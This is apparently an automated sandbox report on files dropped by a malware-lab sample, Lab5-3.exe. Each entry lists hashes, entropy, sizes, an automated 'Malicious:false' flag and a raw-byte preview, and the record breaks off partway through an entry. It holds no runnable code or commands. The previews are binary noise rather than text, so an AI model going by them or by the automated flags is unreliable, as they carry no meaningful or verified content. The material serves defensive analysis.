                                                                                                          Preview:.. l..7./..U2..i..s...5X....]?p.*] d.0.X...qk[.A.n0>...3/2....l..(.(...i`.&....*C...........T...=x.4/J[.].R....:....'.FV.SNG.E8.b............;r.%<.Kf..tk.6.Us.u.c.._.k.e...)fSY_... =.UE...P..A}..[.[G...~...........1)..W.F.@..'..I.....E........-.O..$...,...ps..J.A.CZ...q.c...q?Iy".$(..,.....y..D0..,}.,e.ld...c.......z1<.j..9I...*...RY.ME...........O#.>..k..]O....aD....d..]>.7../D.-....B{......}.....p<m.!.............UE.:Ux...c..E.c..h.oO..$..R.^..B....2..}.G...D.v.../B.......$ p...O.],.7.+.e..!.t"...6.......3..=...Mb.....0.cV...\..L.*.{.#9sV...;..K(BcK.A.k>.>:...]do......A.3...!..]...f.A..H.r..l.4P.....F..N.e../.Q?.@......{.o1..Ga]l...&<.<Q.1.J....>..X.]$...9%"|...{nj..6..Y.....n'..J..z......DjY....F..T..i..B.[.}...u...2-Lk_L.n..l0..&g.....Qu.6...k.$R.5.....%.'...5.m.X.R..'..\...~.VO........nhsJI..{.s..{u2..c....R-......s..v....T.P....xx.L4.h6.`..m6.VW.........\N......*..>L^.G.....[ot[...@.M..k.b...:.N2m]....5._..j?.#.YA..f....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.931207241455696
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6qkckJZS7iOiYXTf0TT710utiHfUTid3hBaUoSGFcmeykEdEElU92i:6+i5YXTs77dGx0uKeY2ElUJ
                                                                                                          MD5:5190D4530F95B39AB0549683EF63AFEA
                                                                                                          SHA1:D438AD0A28D3122D24D7451098E988D441B68603
                                                                                                          SHA-256:E5DB80BB1B1F90FED4D63558085A9959DE05ED6FB89742DDAA54D93B3A22BE5F
                                                                                                          SHA-512:FD8A59314750C4ABD56A99E451734C951AA565D1467A64D952984A6D232E514CC72C850D1454A309FCB49AFBC634A64D203CBF5D127E40F5FD32CE4327F3DA48
                                                                                                          Malicious:false
                                                                                                          Preview:...C..t.4..g..;(p.N..^.C^.x.>o.....%..u.94h2.V.E........Y~...k..h.._.A..2Dg.2&g....*.L...s....2.......$...E..I.A.. G._.y.0 . .&..}M@.;@.4et..>.6.Gp..Z................\h!.]....T...Wd......z....8.....P......Ws.".5..X!.U.q`....X..;!...oV.....Q9.YD.k\.{..ha..ND?U..p..X.F`}e..Q,.q..F..=.....MV..k;.F.w.T.PgX..C.Q.va?..0.W.5....3.....R....4...?Cd..r.Q.>7...!.?.]..0\h.7...IH).Y.....fE.w.-...].1#..?..^b.;...e.`..J-U..@SB.CL:......%...W..SN#..d...~|9......%....E...(aZ~...-.6K.4.~....`J..r...}.k..G.....0...o.......aKt....Y*_{F..tZ..mC....F*f.H..R,.m... .. 6;:..)me...*.,...s.I...&.%...E.y.Z.N.....O.......VT..[Z..O..@.&".n...ra.5l;T.....g...y/........s.Z..*.T..~+(..N..p.C..}N.?....f...<.R....%....A'....#....M.;XDb\...O2N...gZ...!.i..9k.<93....p.%._~........:......d..."...z..\WY2..VL...=C.x..]..K.s.......xF..j..#..>..b..G2...[.~..V...'....PI../..AR.5yP.......;...#.+...M...{..F......................"*......?...x..6.XC.xV.=G.a....O..V.9..8..n.C.u.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2080
                                                                                                          Entropy (8bit):7.91007400994854
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Uue1bKrcZny2atvv6FWVNTWsHfUTid3hBaUoSGFcmeykEdEElU92i:YbKrmyjFVNTWrGx0uKeY2ElUJ
                                                                                                          MD5:5FDA700D0B6B538130157AD544C05BAA
                                                                                                          SHA1:D60BD9C5EC6D1B50145863EF0831167942CF5233
                                                                                                          SHA-256:150B1EE2C59F2124537C13B05E489FB6CF662128E60D6AAC642C1D599D1566BB
                                                                                                          SHA-512:BC5918353C875ADAE28390212E18A2162913EE958B123097BE60D15E713FC06FBAC5C607CCE3845F96440EF19CEA904D9314C1347B44348DF537B8462EDE5C2E
                                                                                                          Malicious:false
                                                                                                          Preview:~o..........C(pa9{.i..S-(...!...... '...F....71^.H=g......L.f....`ELC..,_=."g...k@.UQ...?..%gz..hu.\.Z..h5X}.o.w.<.O.s.R. .v...h.......`f.`l..d...p.#..'x.@i.i.b.......0......5..P...`Qw...."2.........O.L.,......M...y....0L)l..2]...~.G.s.1..X......?..J.4....@..j...d7<$a&...G.dK...B&....E.=.wyw.~e........".2.......c}\:Uw..s.$..."U..)\.p.0..mbN..mY.3&W....|....s..{.=m.{..C.^..t2.c.5.o..WN...37.J2....v^..*#m.{....B+.d..L6B.C.I..J.-.U..F..]5.N.kKrd....(..r..:x;.L..Z..z.,!N..O...`.n..x...F.~....vU..a....@,.BH..Y.w....[R?8m..d..j"..._.8...y.A.....[.4.H.D.R^.."..e.........BjA.*hC...m.l5..g.../...b..........@A..... ....q#.R.......o.C....O.}.U...j.P.$..\.e.vf..j.2.q...}%L.. zi......t.!..r..0j..$...C......./).O|/.2........L..)AGM.)[......QQ.`.m.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.929810221739291
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:65ugourCWb6McZPNCS4MFWWgwlqnrZwwmkzGhyHfUTid3hBaUoSGFcmeykEdEElk:65VoACWbhwDb0WLIrS64Gx0uKeY2ElUJ
                                                                                                          MD5:D18C8FD0AD5AC63032AEF4B123327D8D
                                                                                                          SHA1:A06E91942CE10FA382B16F8FFC972802553919D9
                                                                                                          SHA-256:5841EFB4E06DA543D1651C746DA3F4BC51445618DB69159F70E4A5EE978E7309
                                                                                                          SHA-512:4D8EBF046010395938B287748ADD40EE3058812A1F7822177378CBEB6D88B84BBAC78226DD2F6D857169A989735356A4DB3E1AAB252CB32C97CB0500AFFFA168
                                                                                                          Malicious:false
                                                                                                          Preview:.|0.$f..U..C.. ..6.k..?.N.1.Ll...:@13.S.R.u.%=u..2....Lj.1....y....V.".e.......(*K...x...} `*.....G.Gg.OD.9.;4A..x....`$.(..7..j.V.i.C?*..n.....P.....D....H..*..e......#k.T....?M...B=.P.;......G.B.65L'T.......4.-.......k.~..a,.a.E..J /...A.o.45...,.(......~....+...o../.h...I.(.q.x...._...F...s...u......1.p.0..@.u..........CC[rE.W.....OgRzE..x..I$A...h.l../_p..U..R.~......>..xo..N..`c....W.S....h..1...f.kZi+..+<D.."....../...."..o.\<.s6.:(m.e.j..B)N.4.1.#.%N.... ..j.#.N.].....Y(...{..!....q{../../...c:...\....P.b...j..A'G..9....q/K......B.t...7.Hk.$.nW}.k.....p....Z.I!Vl+h.eTp...y..0E....G.z.81n^.....\T._....]N....2...*=./0..{..)N.C...z.O.....>..|=...t..P.P.p.,...0..^.B....I..)..er...a...k.`4....f..8.?...L.362.......`..<h]T...+..;...wb..../..KI....p..#>.G).}1G..7.\l...L.mb.Q.....q..}...~.X>....A....l.=.Wv=..UJ.}..S..6..W...).*...$...h.m@^Y.$}.._.....Y.e.......?....h..%.e...V....$...........v..b.....F..hbO3.h....hWr...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2032
                                                                                                          Entropy (8bit):7.920989470516847
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:unZxZuZe3GLHfUTid3hBaUoSGFcmeykEdEElU92i:gZxsZSGx0uKeY2ElUJ
                                                                                                          MD5:F9EE6C5915AC5943C8A34F0296D9EF9E
                                                                                                          SHA1:E80ADFB0AAE3EF45DFC7B0514E8186F03B767A39
                                                                                                          SHA-256:F09953D9625C0B9DB26E884A2B15C789CDEE5EF9642809AC555CCEA2E93FF52C
                                                                                                          SHA-512:3DDBAA0431114E1F099F715785121BD8AC7B64C6AD2761FE538048D517996836BD1FCDF33886E6359A587980145D5A80DB30775463BED31F3111DE23DE6A812E
                                                                                                          Malicious:false
                                                                                                          Preview:~.pO.Z..A..?...d..k....,.E..9u..%r]..ec.rT@..c.A..Y.~..Y).....DVy.u4..t=)..G.|Q..<K....z......:.. T.u..P......\`&?.>...2T.......u.I}Qf.`...g.Z.y.U.`.B...(o.-do2...{..."......lE.....Gi.t..7....*...%...l.......*N....m..@....w...^M.6..z3.$.\c...~.|.......=.qP..Tu.Rhb)..vWDK.[|F...GC'I.#?g....{&..Sj..7x.p.m.[...q..h.,...Z....iC..n&..E..,/X...~..P}k.u9==f. .....!]j......\.q...ws.A2N...>_.].9...Ya....l...m.]. xo.8W{...o#..{...U.@.1.$.4v].L..[.5.....4.;.[.t... ..c...S .....M.o.e...z.T...)+O..r.*..&d.......#.`.rN5..W...9."R..DfE....5j.....0T..."......\..\...[..:Y*...,.8{.>9....2)...l....d(D~^.%...}9..x...6 w.8Y..)..N....eb}9mP..c...+,:HC.L].'..2...p...=.s.?If..x....mbd...ny.W...S.m..B%....1.l"....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3280
                                                                                                          Entropy (8bit):7.941146795515857
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:d98xg5Wzt1/CYBq7V7J/bXuz3xGx0uKeY2ElUJ:zWzzCaq7v6zK0Cb
                                                                                                          MD5:22B8D140CF6725288AF9ADFF9D734895
                                                                                                          SHA1:1EFEE918E6A5AB75F8D30F06A635A9D5813A8C97
                                                                                                          SHA-256:BB08DFE2C10AEF5CA9CB057174376274842C99E27F62332DA26354AEF011CC77
                                                                                                          SHA-512:53D6670798CB5DF0ECA4E3FF17A4EEA1ECB2D45C02170D958AC048BE13A6A0383ECFAF8202A206127B0C6204E164EC407D9E9208BC3B13BA67457670D0592B8D
                                                                                                          Malicious:false
                                                                                                          Preview:!!..>uP...j..Z.v.X..).....H...@>.%.H|/......<:...4!.M....W.Hx. .H..!uq..G...U......%...w#&.L.[k.2}..5e.Z%...L.5.S.7.M.....)s..h....eq.6....&.f.@7....<E>...I.d...';._Epk|e.D...<.o.d6.;.4.=...U.n.....f.8)..s.d1w...t.3.v..L8. ...\P..s.|...f&....2P......K..k.......E..*..xu..np...<;..............7...H..........y.7.....g........_...gOw...S1ah..V.&. ..0.`...*.(<.qI..z.b. @~.J......KI.~(oP;0.M.OL.. .&......v.......g...............9...;.U.t8.b2..\...).J.KJ....E.=NS.J.[/.+:.F.'..:b.~.Q.....Aw.m9.E...t...._...]......A.......A..VI....>..`A.**..n.'[..q.L.Y}..~n..o.I...A..3..^R=.:QH-.*RK....|..v..r|O1....].c.....Jq.c.W......H.j.F........@!.@b&..+..t..a..*+...nAo3......M.sp.7.G_{...6..-.IOw&.........>....Of..Qi...h.,.!.".\....P..$D;*.`....;>.5.g=,l.KE]>........e.Y.Mi..N...Y>X.Ji73.!.:....`...B\m....}^...Q1]g!`AY..p~..d..#...L...A..J..jX.i8./..p*.y^q....B.Z...c...p.C..Q5....'...).../W.E...\..6....Y........./..p.b.`.......^..4..I.I..0.*..5..L.4
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5264
                                                                                                          Entropy (8bit):7.968955029178664
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:XS/zQZuSQ7WWHJIZuzUhzSmaa03cWyF27nJuF7fMCyJAJf6LGx0uKeY2ElUJ:SzKYnJIBPaa16n0F7ftJC40Cb
                                                                                                          MD5:BFB047993BE6B19FA5AD4F130C9F1E3A
                                                                                                          SHA1:8331F033B39329442E2AA771BF8DD03B93DED988
                                                                                                          SHA-256:0994BCD6794946F6038FF8BAF66F9D484272F4F8858D4F9863DAB62ECCC4AD6F
                                                                                                          SHA-512:F35E3B833CF3B5557FD2A355643E09265E265245407F2D9633AD0E0143F66BEE989A0BBA5AF4A6460E76292D9C7558134C305945325E9CF3A0C4B632AEF097D3
                                                                                                          Malicious:false
                                                                                                          Preview:..i;.G.Q.H.4....H...;O.?..4.........j..{.%!}t...6.c....f......h^...9}.D..lF..sT...9iD...4C>.^.cdqd......eV..\.o..Q.X....+.7..~.n.-...~..).../.9...\W\..'.!.r.4\d0.@.....R..!.H...i..)jv......h.Y.w..C..i9..u.?.3.......O....b......6......tK.....$...j.;...T..@y...e..E..L]..h'..F..[....#.P.....([..s.D.uO.TN.....N...U....^^.p?.e....@...IQ..)).PJFR..o..eo...A..,.?..v.%C.w&....r@bX..r,.2l2.D.~.I..=P......e.~\^....=I3.&..H':kY=..VBF..:..B..E`..1.q-j.jI..K..:.+..2.I......`.T...w.Wwd~..{8.E..PEd).{..f...G..C.ne.b0.=..QL..f.).j.:~H4j.V..1c.f.......`.Z.!L.u...PLn*.G0..2&..v7......y...X..1..,$.so..M.E..>.[vKSA..J..d...6.ys...\.t|..b.<.F...V5...q..@.......$.3....v...c,...5.,..@..[O.["D.c<..;.f.`.Ec..d..0..6.L3$p..M.vW.V..k...(O..7o..B.J......1.$N..7ZO.&.7.X..=jS.A+.........QO.-|.._.w.....D.....*.4.v.b.3....q.Is.I.R....G.N...Ii.W.5..._.+C.8..4>[h2y.....<../Up`.~..:.U...c.....Tw.[hY._3...D. A...`.|o z..{...Uf.0m..LWG/.}&?.2..Y..#.`.6.....h...... .$.-.//.h.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.908724201412742
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kuZgSpE4e8gpCSHfUTid3hBaUoSGFcmeykEdEElU92i:TlE4PmCNGx0uKeY2ElUJ
                                                                                                          MD5:ED528637D2D37FC56D75E8E52DD5629D
                                                                                                          SHA1:C4EDE69A89B12FB0358C04A89CF5E4EE82C06FC9
                                                                                                          SHA-256:341AB2F152A9E7B1ED564FDDEB1B7F987E1D642816940C0BB70B0E361CA1318E
                                                                                                          SHA-512:BB5EF471208AF8D7B84E1B026B9A6C39EB00EDD47D1C3A11485D090EC547792C914A19BB64D13AFCE807BAD7DFCEBD57125CE86EBD44D4C89ADF5EADF69821BD
                                                                                                          Malicious:false
                                                                                                          Preview:.~|.h...An9.O@F.Sa..?......~).......[..K...#6W ...s...t..hFv.?.}..K...:!..m.]} 9....<E.......@..&p?..].......7I0.i.-.#(Y..{..r.}..)8.....GoMx.(.1.J4..a....OQ.fse.".....~..zto.....o.V.2JN`h.>.....8.;g.........ad.\7.0.27.r...M........v...`*.j#.....`....lc..S.'0.Z&.,b..;9.V....1:T.7;.&.[....B..*....k...^.yK..+E.....+K........A/z...'.l.S@..|..~:..#.....Q....':.......K_O.{../G...$S.+.qs.....[#....t..z{t...E.47.4.Ek....<.?...\.@c...]..o..`$vM.gq./.y."....h......oZ.M.<.......2.....U.........p..v@.b...l._....e.....n....M.S.X.h"..;..*a.)gn..FZ.$..r.*.99c. ..5.<...^.L<....4........0.=jEU....K..AIa.p.8S...}cO.@3T.I...c...0.Dc&rN.....$...%.^..~..8....b......W9...G.{..m|.....,Ft+.e.c!...`..>.Fjv..X.....iz.C.X._..n.....S..Y;.9.'P..|..Ah...6].WzRu,.`...T*.*..P^gYj...S\...@..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.899454070117246
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:GInkWuweUzHfUTid3hBaUoSGFcmeykEdEElU92i:xkJGAGx0uKeY2ElUJ
                                                                                                          MD5:1F252391B918B448E3F036FE7D2B9C13
                                                                                                          SHA1:82EC319C4AD86025961A21BEEB5D865DB4FC3A77
                                                                                                          SHA-256:6F1440309BE62BB6873F1912F5A53F1DEAF22DA023694054ACEFBD0CDDA62F97
                                                                                                          SHA-512:5A8EC16030C734D1F2C060AA9784C92C36A5B8EE9B71E5789E373DA79378210644EF334D69DE25EBCEFF5CFBC52F60C0282F66613EA8863E478B541DD12163D9
                                                                                                          Malicious:false
                                                                                                          Preview:.0.......{.z.<Uq.v.0...............].......q.v(.L2+...r*...2{r.7....v.A.=3.......|.j9....J.tt.* Z..i..ep.._..y....XT..C.....C1..u.7j9.nR..}++...z..d.........,.....6.5='...)a.J.H5....>>....=...u...<..M.>....xKM..)...R...t;W....B.uO../I..p-.\.@}..BC....w.0.Wg.-.."..L.......A.. ....i.....PTv....o{........(Lc:.R\R.i'.Pn".*.&.}.@.-<..Bt..U.'..k \z$.'.1.../....&q..Z.9..F../o...n.f.Q.E."......U&.y............".5..W,.";..a...eW}............q'..!....A...E...8.1e..`.....S..r+.H1.F.S8.+|C.T..u....E;g.......nv..N.......R.....1..E1FR?...8.^.%V..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6336
                                                                                                          Entropy (8bit):7.970127375885168
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:54sm/af3r0ealiOpDANo+nxFp4R1/wiuX910zJGZfkiXpJ2f+iQuhcwGx0uKeY2b:Osw+jacNFnzqRRfOBnXpJ2mipe0Cb
                                                                                                          MD5:8A554635FB8FCB7EEE3706D9B5703399
                                                                                                          SHA1:3FEAE80CEFCE2470C0E67930A81E04F1DAF5E369
                                                                                                          SHA-256:5B74B9C2EC5B9CD092EA3D2D47AB79970A708D1B6897BD8B3C3242203EBEEFE6
                                                                                                          SHA-512:9B109CD2A9321F8C23282722C80679BECFEDED559C0702E20ACF4AF1F847A4C1395BC0806F2A93E96CC6B626CC89EB1FDD099EC1473B2B567AA803CABCD125C5
                                                                                                          Malicious:false
                                                                                                          Preview:...J....k...f...=z.....B..........8n9.t..(..cR.=.y.8..r..d.....5..J.U..F#.J.0Lo...Y...c7+.@%..`....V...iL...I...6Yb.....\.>S6.{..1e..x6F0..m.p.X.47...E.......8..b.....7.'.....6.X..iB...7w.Ag..y..F..S._X.E7U..N.n...b."....0|X...$.-q..L...I..$.............C..}P~3Fv,._..>6."i.;..p...N6..d..1.1ke..Z.H.....N....U..u..n[.....3.f.N..,..U..P{.....4*0......+C....U.<.4...-.C.V....'47.......zN6.&.....r'U....2.<.|.p...9....Q...$Ci.x..M..<.d.....*..f`_O.{-..\B....k8........n..9.YD..(..{.......ar.1mN...7.v...K.1`&H....D.7......H P.{...d..o.....}..,...d.G>.-..D.uc%.9~...Y....Kh...w............Fa..m1C.W2...J.....O..x...p.*.Q...{)G.zd....+U.=z..(.....lG.4.(e.N.p.Q=..$...0UY.h.g..]...m...VC.!.4)<9d'k....|.-....M..9.V..<.@.....:.../*..."k.7^.y..Hl.n.....P.YS..6.G..X..9i....T._q...Z....D)..]..]..+d...S...s.qL.........R.....])=ZfV... ."...L,ka.k.....O..f].9... .8.4..wC......=.n..4sd&......V;BB.V-.P.B^.]..3J~..H%..w[.o..]V.|...$....0.t.-y..H....*..[?;..%..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10608
                                                                                                          Entropy (8bit):7.981679097989901
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:2Uyzc1WzP9tXeBFWq0gk2o8xaN9D+OQdJYQW+LmSkkl0Cb:2T0OtX1q0Z8xaN9DDyKQWWNltb
                                                                                                          MD5:DD6DFC720F0D5892EEF20E1C7C214B56
                                                                                                          SHA1:4515E5AF7BC82C87BF4A3AF834BD061769FF7EAB
                                                                                                          SHA-256:C107507AA1184D273C39F9475C7FA4D5B92EAC7E4B028375633D3868CB19398E
                                                                                                          SHA-512:F210FD03DCB3C7273B3DF471C428B902B11628AB4D006D3FD90F29F6BFBB2A071B664D30A6C6F9B3B83062CC07DC78BEF58FFD9B5FDC0B473251CD6DFC042725
                                                                                                          Malicious:false
                                                                                                          Preview:/.x...Mn.,...f..9S.HY../..2{...F.Zy.c..N..@...=b..........F.j9tsH~.....&{....t.q].7j.U....._...i.V.0..o.o4rz}.X.AFZ..>.rB..6 X.4.6t.......0`.3......&.A....;;.1.e...b .%.....].j~.Dh.y....8..O_....^....a.8N.>7...........x`.).9..m].F..A.lv.T...Bg....Z.F...[......,.....Q...$B...a:...wg+..m.._R..Z.1.....I+W\c.{.S...s...x<}.|M....U.\........oq)H.[.+...g.=.XA.""..U....*..6.(.^..:Fn.,.....R..b.f.............H.*.>.#91.+......qr..p.....XD@......[8.1..>#p.5s.f)...rtk..akdc..I.......*.+.S...x:.h?*.1..i.......$.'.q.T...V./.;..Z.....C>uA.9F..mJ....O...i..<........@.p#../...........-.)1=.T{....Dc.L`Ar...$*.........w...l.D.+.z...e..=...N......3T.0....L....4s>*.!.....Q<.qq...G+..n.>.l..n..:@3K-3Rj..O.T..S....M..|1.~..X.E..3..r........B}.O.|......P..C.i....c....,.k*Q..4W..Eh.....`..[.D}).,pg.r....hR.K.....E.2G..@.sd./i.C\.I"..?.vL>X.....+T....P..'&...H.....}[.....>.3E.y.Y..b,....a.+..O.5X~...~...Z......^.(X.N.`....2[...`.;]cg......!.g~w...i......<9...T...}.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4320
                                                                                                          Entropy (8bit):7.95753227440168
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:/Isn7NpUGKif+VLpTDdBOqRldvjGwGx0uKeY2ElUJ:/Vh2GKua5fOClID0Cb
                                                                                                          MD5:5CF4C676F8483CBF7469BC5CFF35D65A
                                                                                                          SHA1:523BF06439A880BD31C7440A406FE34A82B8B567
                                                                                                          SHA-256:3A6781F75B30C754CA2BC60737A9C9FD5697B885D5500BAA665B5699A9603704
                                                                                                          SHA-512:55D2E98DB81231F62EE77392946E5D4BA4581CFE714231D3C75A91DF8D401B8F96FC1470C4AB031E75C59202183403B87AF42A94A9EE59C81FC9197E2066A915
                                                                                                          Malicious:false
                                                                                                          Preview:.ml.....|&V....w...]..v..@.&.. 2...-.....d..[U..$o.@w......=.H.~..O/....u.q..>/.\...R..C..Lq...T.%R...bk.7zo..0Jg.5F+:G.....t3.N........f.c/...fT..%..&.......~>..|d...1.#.x.(........U........).........`.4,.g.....lz^r......OKH9~..g.......7A.[..._%...Z..Z..dx.U....}.J...e_1z...Q.<F.V....G....f3.&..N..uL.`.I..B.yA.2......1)...Dv..5i.2..2..@..$..w..D.Kr(0....A_d.LUd...,^.{....P1M...s......X.k..`.2....>......P...:..}.jZ!9.%uSY....".!.$1...K....+n.gL.!p........qv.O%.6C-..G.UJ.b.-.f.!..)j}Ub.....2.sT.........9....M.K...k.*..ew..Y.^OOM..<....R.._Q"............6........F;..........:+.`.9.A.7...r.Umo..)..q.J.......v..2..?.(v._N.....x.I.........<..y.M.....G...-.Z..Ht...L.Q....|....W.._4..(.h.*v...\N>#+^.-.a!.\<.d.^%..p....k.&..7......".g.5.J..d.BW).O.{`..}.S.d~0..........a.....Q..K. ...... Y..X.Z...Q.....1.Gu.{@j...Ija...~....Y.9.Qv_W...Cl?.*.G..\LS@F...X..S.......FN.|vI9.r:.8Z....L.)L..Tm.{#a]=.,...1....u:.`.[Y.}(..Z...d.n..L.pO.....p.P8.L=..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5280
                                                                                                          Entropy (8bit):7.963344338769809
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ldai2SCJ9o7qzpgIxsvF0rMDgDWq2VraxFQOFXJJiQq4NNZQ4hsoVcaGx0uKeY2b:ldLB2Tsd4McaVrlGXJJaie4h5VA0Cb
                                                                                                          MD5:C5AA98F68DAB97B1ECD0FC95379A1FBF
                                                                                                          SHA1:184A3F40E0A2557D52C590A791861FFCCE4A3C44
                                                                                                          SHA-256:593A2B76E2AFFD0FB46649CF815068EC0D8BAACFD76FDE5571969E2F31D350B0
                                                                                                          SHA-512:E1EF72EB70C17F2E912183C55613943FAEFECA59936044824A8607CAB337AAB07F233A4591F68ABA02FB8245A2A40400BDF3BE0E9F5D9B7A72CEDF1F3C45A0D5
                                                                                                          Malicious:false
                                                                                                          Preview:..Z.m.)......T.`5.4.+..8..Wh. .8N....$....&...'~.Lv?e.ua1....x......rTj......5N.D..9.....4.lr ....Q[..)p.m.JP.......'6.r...G......`x..kg..=...g...v!4q.=Mej..5.+..}..kai./O!y.G....w........s...:..Gb.K.....O....'....^.Z..'.o.a.h.&ROY.d#.........f.....-.....MX....%.,......U+v..>..A/...V.jgI.......j...:`....s......=.|g...e.p.N..I<......u.0)sE...aP...\.Za%.a.L.......^.X.lc]...c^_(....$...pD!..{...$1,....ut.....j.....V .."o...,....\..n..T..?,5..A.C..&K..?.@~.]l}>.!Cs....-...7K....w*..>.p...;.n..K2R.\.(...VIAV..........I+.Z..ll.7..h........S..$.....I..Z.S..b.J.a.P+.[.7.l.......x..5-.....o.......4......./B.....*5.....L.....r....B:..%h....!,..L.J.G.'....>..0....].6.P.{.....A...,v..S"..WN=.n.....\L..."F&...a.(.M.\....L..s..gL.n...kV.....*G.G.q.V......C.....W0.*......d......N....pFJ"....+.nc..{w.S..Q..0......B{~..4...)p..5.[.y'.....4..c..[........b....S...._..d..P8..4u.(>.B..4.I.]....)..C.Q.IH'..sDs.Z9..j.FW.L,.bxe.....&Sa..w..t..n....5...v.!..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.94906504927017
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:yf9D5SveM/S9+rJo3yu4jzxotybtH8mzHfUTid3hBaUoSGFcmeykEdEElU92i:gx5e/brJo5eoEbNYGx0uKeY2ElUJ
                                                                                                          MD5:949C8C11C928575A6EDBEC9DED78F06F
                                                                                                          SHA1:B6945D87E08F15C39FD549ED6E712350A0D6B51C
                                                                                                          SHA-256:EB19F40C8E39ECDE5CBABD59A790A92010107E6B0A1BB9CBAC22B65D297B2687
                                                                                                          SHA-512:08E7E5A27BA559EBE07668E470B62FE7CC7CA80AF7A3B5A9FCD9D022ABFDDD1C7EE345955E2092304F3615FA097808BBFB3BE1852DF2BD10431BE19712D5C54A
                                                                                                          Malicious:false
                                                                                                          Preview:z_...a.oHT[.g`}.....h.u..Z`3.J..d....jZL...8<...f..l..9~..w.Cm....k..'5/~..7..kT.)X.E...Z.S(.lc......%+<...P.}!.clq...uH...+&...i....j.f{[....Db.............yM...X..._..w~.m....`{;.x.V....>.P.c...|.A...>..}.U..V.c...z....T^i`2jJ...3.|N.!..zq ....u..8Z...W.=....K......>|._&)..a..v.P.W......^Y...8)i.#.y.1M...i9.'.5.`C....S#5..Z.s....s.s.QKA.a......X'.M....'9.. FvN.c.9A.zr..^.!X...._...}@..../.;.N.\{.%0.|_.Hpz..Q.....q..t: @...:nh.U.....]11v..MO....`.B9.>. ..."$.1...^....VS-.Lc...*.....U.+.\.. ..b..].(.V..!z........n'..S"Y.~.J..H..REY..Z;..b........=gt[...G/0(.p...S..(..".'D..%9c..2.\..N.3.C..E....6..^lDZ....I."...a...-cal3...E....H.Y..1....p..m......#.?.......RL....m..I.'..r...(............[.P....-...^.].g.ERI......{U..P.>....K.]....?.~Y>...I.R9j*`....S.?.2P..g..cA...X."..3.-.dch-QKd.p..k..@.Rp.x..:.yn...!fp..!.v......:..p.t./T...B..+X...0....n......6..N^.K.U...6.h.Hb!...d.\.b.'('_o.....e.sq../...?f.....T..F..ho.4..mK.u.+..Yn......;.[..X
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2992
                                                                                                          Entropy (8bit):7.934003090357707
                                                                                                          Encrypted:false
